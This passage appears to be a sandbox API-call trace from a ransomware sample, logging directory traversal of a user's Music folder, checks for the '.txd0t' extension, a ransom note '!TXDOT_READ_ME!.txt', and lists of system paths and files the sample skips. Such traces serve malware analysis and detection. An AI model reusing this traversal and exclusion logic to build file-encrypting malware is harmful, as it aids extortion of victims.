returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ" [0119.820] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\" [0119.821] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\!TXDOT_READ_ME!.txt" [0119.821] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.821] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.821] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.821] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.821] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.821] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.821] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.821] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.821] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.821] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.821] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.821] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.821] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.821] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.821] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.821] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.821] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900a9540, ftCreationTime.dwHighDateTime=0x1d5f045, ftLastAccessTime.dwLowDateTime=0x2c28c420, ftLastAccessTime.dwHighDateTime=0x1d5e67c, ftLastWriteTime.dwLowDateTime=0x51c79a1b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7e45, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="U7kcA.mp3.txd0t", cAlternateFileName="U7KCAM~1.TXD")) returned 1 [0119.821] StrCmpW (psz1="U7kcA.mp3.txd0t", psz2=".") returned 1 [0119.821] StrCmpW (psz1="U7kcA.mp3.txd0t", psz2="..") returned 1 [0119.821] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ" [0119.821] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\" [0119.821] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\", psz2="U7kcA.mp3.txd0t", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3.txd0t" [0119.821] PathFindExtensionW (pszPath="U7kcA.mp3.txd0t") returned=".txd0t" [0119.821] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.821] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900a9540, ftCreationTime.dwHighDateTime=0x1d5f045, ftLastAccessTime.dwLowDateTime=0x2c28c420, ftLastAccessTime.dwHighDateTime=0x1d5e67c, ftLastWriteTime.dwLowDateTime=0x51c79a1b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7e45, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="U7kcA.mp3.txd0t", cAlternateFileName="U7KCAM~1.TXD")) returned 0 [0119.821] FindClose (in: hFindFile=0xec2030 | out: hFindFile=0xec2030) returned 1 [0119.821] GetProcessHeap () returned 0xe30000 [0119.821] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.821] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43d9ce90, ftCreationTime.dwHighDateTime=0x1d5e6e3, ftLastAccessTime.dwLowDateTime=0x9fad7510, ftLastAccessTime.dwHighDateTime=0x1d5e57f, ftLastWriteTime.dwLowDateTime=0x51cc5ebf, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xa77f, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="m-T19pWPhwjALOHNq.wav.txd0t", cAlternateFileName="M-T19P~1.TXD")) returned 1 [0119.821] StrCmpW (psz1="m-T19pWPhwjALOHNq.wav.txd0t", psz2=".") returned 1 [0119.821] StrCmpW (psz1="m-T19pWPhwjALOHNq.wav.txd0t", psz2="..") returned 1 [0119.821] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0119.821] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0119.822] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="m-T19pWPhwjALOHNq.wav.txd0t", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav.txd0t" [0119.822] PathFindExtensionW (pszPath="m-T19pWPhwjALOHNq.wav.txd0t") returned=".txd0t" [0119.822] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.822] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e577330, ftCreationTime.dwHighDateTime=0x1d5e38a, ftLastAccessTime.dwLowDateTime=0x51e436ce, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e436ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="rUUROgRx9gfXRUYVye", cAlternateFileName="RUUROG~1")) returned 1 [0119.822] StrCmpW (psz1="rUUROgRx9gfXRUYVye", psz2=".") returned 1 [0119.822] StrCmpW (psz1="rUUROgRx9gfXRUYVye", psz2="..") returned 1 [0119.822] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0119.822] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0119.822] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="rUUROgRx9gfXRUYVye", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\windows\\system32\\") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\windows\\system\\") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\appdata\\local\\") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\boot\\") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\perflogs\\") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\programdata\\") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\drivers\\") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\wsus\\") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="crypt_detect") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="cryptolocker") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="ransomware") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="C:\\WINDOWS") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.822] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="C:\\Program Files") returned 0x0 [0119.823] GetProcessHeap () returned 0xe30000 [0119.823] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d2) returned 0xed39f8 [0119.823] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0119.823] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\*", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\*") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\*" [0119.823] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e577330, ftCreationTime.dwHighDateTime=0x1d5e38a, ftLastAccessTime.dwLowDateTime=0x51e436ce, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e436ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1df0 [0119.837] StrCmpW (psz1=".", psz2=".") returned 0 [0119.837] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e577330, ftCreationTime.dwHighDateTime=0x1d5e38a, ftLastAccessTime.dwLowDateTime=0x51e436ce, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e436ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.837] StrCmpW (psz1="..", psz2=".") returned 1 [0119.837] StrCmpW (psz1="..", psz2="..") returned 0 [0119.837] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51cec0b9, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51cec0b9, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51cec0b9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.837] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.837] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.837] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0119.837] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0119.837] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\!TXDOT_READ_ME!.txt" [0119.837] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.837] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.837] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.837] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.837] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.837] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.837] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.837] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.837] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.837] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.837] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.838] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.838] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.838] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.838] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.838] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.838] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2570ee90, ftCreationTime.dwHighDateTime=0x1d5e0dd, ftLastAccessTime.dwLowDateTime=0x10ae3e50, ftLastAccessTime.dwHighDateTime=0x1d5ed57, ftLastWriteTime.dwLowDateTime=0x51cec0b9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17272, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="ioaNBIFVnbYskp4.wav.txd0t", cAlternateFileName="IOANBI~1.TXD")) returned 1 [0119.838] StrCmpW (psz1="ioaNBIFVnbYskp4.wav.txd0t", psz2=".") returned 1 [0119.838] StrCmpW (psz1="ioaNBIFVnbYskp4.wav.txd0t", psz2="..") returned 1 [0119.838] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0119.838] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0119.838] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="ioaNBIFVnbYskp4.wav.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav.txd0t" [0119.838] PathFindExtensionW (pszPath="ioaNBIFVnbYskp4.wav.txd0t") returned=".txd0t" [0119.838] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.838] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7c40f90, ftCreationTime.dwHighDateTime=0x1d5e3d2, ftLastAccessTime.dwLowDateTime=0x23cb1ad0, ftLastAccessTime.dwHighDateTime=0x1d5e41f, ftLastWriteTime.dwLowDateTime=0x51d123e3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4a4c, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Mo9aZN_6Jq9VyBd _y.m4a.txd0t", cAlternateFileName="MO9AZN~1.TXD")) returned 1 [0119.838] StrCmpW (psz1="Mo9aZN_6Jq9VyBd _y.m4a.txd0t", psz2=".") returned 1 [0119.838] StrCmpW (psz1="Mo9aZN_6Jq9VyBd _y.m4a.txd0t", psz2="..") returned 1 [0119.838] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0119.838] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0119.838] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="Mo9aZN_6Jq9VyBd _y.m4a.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a.txd0t" [0119.838] PathFindExtensionW (pszPath="Mo9aZN_6Jq9VyBd _y.m4a.txd0t") returned=".txd0t" [0119.838] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.838] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe9605a0, ftCreationTime.dwHighDateTime=0x1d5eda4, ftLastAccessTime.dwLowDateTime=0x51dd0f7a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51dd0f7a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="VdR6kOMbj3V3xP", cAlternateFileName="VDR6KO~1")) returned 1 [0119.838] StrCmpW (psz1="VdR6kOMbj3V3xP", psz2=".") returned 1 [0119.838] StrCmpW (psz1="VdR6kOMbj3V3xP", psz2="..") returned 1 [0119.838] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0119.838] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0119.838] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="VdR6kOMbj3V3xP", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0119.838] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\windows\\system32\\") returned 0x0 [0119.838] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.838] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\windows\\system\\") returned 0x0 [0119.838] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.839] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.839] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\appdata\\local\\") returned 0x0 [0119.839] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.839] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.839] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.839] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\boot\\") returned 0x0 [0119.839] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\perflogs\\") returned 0x0 [0119.839] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\programdata\\") returned 0x0 [0119.839] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\drivers\\") returned 0x0 [0119.839] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\wsus\\") returned 0x0 [0119.839] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.839] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.839] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="crypt_detect") returned 0x0 [0119.839] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="cryptolocker") returned 0x0 [0119.839] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="ransomware") returned 0x0 [0119.839] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="C:\\WINDOWS") returned 0x0 [0119.839] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.839] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="C:\\Program Files") returned 0x0 [0119.839] GetProcessHeap () returned 0xe30000 [0119.839] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4f0) returned 0xed90d0 [0119.839] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0119.839] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\*", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\*") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\*" [0119.839] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\*", 